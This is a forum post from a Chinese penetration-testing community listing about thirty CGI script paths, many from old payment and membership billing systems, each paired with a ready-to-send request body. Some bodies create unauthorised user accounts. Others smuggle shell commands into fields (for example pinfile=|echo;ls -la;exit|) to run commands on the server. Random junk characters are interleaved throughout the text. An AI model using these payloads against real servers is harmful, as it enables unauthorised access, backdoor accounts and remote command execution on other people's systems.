中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞＋使用方法 [打印本页]

---

作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞＋使用方法
==============================

/smspass.pl
username=username&password=password

/index.cgi
( b& ~5 u5 q$ g& Swei=ren&gen=command
9 e8 F' D5 s7 Z! y$ T
1 S- V4 `7 i6 t1 ?8 W4 z6 l2 @/passmaster.cgi
Action=Add&Username=Username&Password=Password

% G' F4 H; _7 A( t9 c' v/accountcreate.cgi
6 M+ A2 f0 C6 j# o  _username=username&password=password&ref1=|echo;ls|

7 b$ X+ r3 Z: i8 v/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
7 F2 l1 F. U5 s. {* {$ y6 b
/addusr.pl
+ Y5 |0 a5 `6 M! @: R+ _1 m" C6 g$ }/cgi-bin/EuroDebit/addusr.pl
3 P& x9 Q/ @3 t) G7 }6 A+ q7 z' muser=username&pass=Password&confirm=Password
, ^7 s0 E6 g; G( r
/ccbill-local.asp
post_values=username:password

. @2 v+ F/ f8 f8 ^6 r& N9 r  e/count.cgi
6 H/ I0 `& u6 u; xpinfile=|echo;ls -la;exit|
8 q. W% t2 I' s
' u. Y* W" Z* a9 K/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

$ G3 Z# }: I8 i0 Q/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
" X" R5 B5 t% A' b
: i% k8 c5 U0 J0 J4 Z  U7 R! R/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
4 c& _& G8 l% d5 l4 Fusername=username&password=password&expire=30

2 R% g2 C# S) w4 a# S9 u/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
& n# r4 T# T2 M& Y, Q. fcmd=ADD&user=username&pass=password
) s/ C" _' F3 k6 R9 T) ~* N
$ m; u( s  o! H! r, F* I: `% Y. U7 l/probecontrol.cgi
% `4 f: N# |" p* |4 g  }% ycommand=enable&username=username&password=password

+ L) s. z6 W8 A/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
& z9 {4 \& `8 q9 f+ b+ e2 ]
/htadd.pl
3 P9 {8 t" l5 N( ~configfile=|echo; ls -alt; exit
& d7 x* n, u9 j2 O$ `
5 M: g; g5 S# w% ^/gx9passwd.cgi
* Y- a  f9 Q1 k( k, Acmd=ADD&user=username&pass=password
. @" N6 ~, L0 v! v
/ibill*.pl
9 ^$ o7 W! r& x9 q0 w  [+ Ireqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
1 e6 q9 C" R+ c6 i! L( [3 cdo=add&username=username&password=password&wpassword=password

/usercontrol.cgi
command=enable&username=USER&password=PASS

/globoSALErum.cgi
  d2 Q* z) f  Naction=ADD&seccode=seccode&login=username&password=password

2 L9 X* A3 Y( K/ g' n) e/addusr.pl
- w7 @' @" A/ N8 yuser=USER&pass=PASS&confirm=PASS
$ h+ \  p8 l+ i+ A; @6 T
" K0 r' H" F/ U) `/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
) E- I5 {* k8 f" X1 Q* q. Tpinfile=|echo;pwd;exit|

8 R1 t' d! w7 [* `* |' r/accountcreate.cgi
% V6 l6 z' d5 R: D: d/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

7 e4 \! ^, F; b2 F) P7 f2 k. N/af.cgi
6 L2 H3 b1 M, U9 W) C: H; X/env.cgi
ADD+;echo;pwd;exit

/count.cgi
pinfile=|echo;pwd;exit|

6 L( ^* l) l5 @7 `5 i  P3 n/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
0 t# D5 E8 h" s* C4 Z( ~
" n7 l0 M6 s6 }/add.cgi
username=username&password=password&expire=30

- C0 ?) J+ H. g3 [( E) Z/ G==============================
9 f9 ~0 l/ X% @0 L  b- w  {+ b9 t

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2